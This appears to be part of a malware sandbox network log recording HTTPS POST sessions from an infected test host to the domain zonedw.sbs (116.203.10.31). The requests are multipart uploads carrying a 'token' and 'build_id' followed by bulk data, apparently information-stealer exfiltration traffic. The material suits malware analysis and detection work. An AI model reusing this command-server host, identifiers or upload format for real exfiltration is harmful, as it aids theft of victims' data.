30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 58 42 31 36 50 38 59 4d 59 4d 59 4d 37 59 55 4b 58 0d 0a 43 6f 6e 74 Data Ascii: ------HVKXB16P8YMYMYM7YUKXContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------HVKXB16P8YMYMYM7YUKXContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------HVKXB16P8YMYMYM7YUKXCont
2024-12-14 11:57:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:39 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:39 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	50107	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:42 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2DB1DBIMOZU3EU3O890Z User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 5a 0d 0a 43 6f 6e 74 Data Ascii: ------2DB1DBIMOZU3EU3O890ZContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------2DB1DBIMOZU3EU3O890ZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2DB1DBIMOZU3EU3O890ZCont
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:42 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	50112	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:43 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----MO8YUKFUSJM7YMOPPPHV User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74 Data Ascii: ------MO8YUKFUSJM7YMOPPPHVContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------MO8YUKFUSJM7YMOPPPHVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MO8YUKFUSJM7YMOPPPHVCont
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 11:57:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
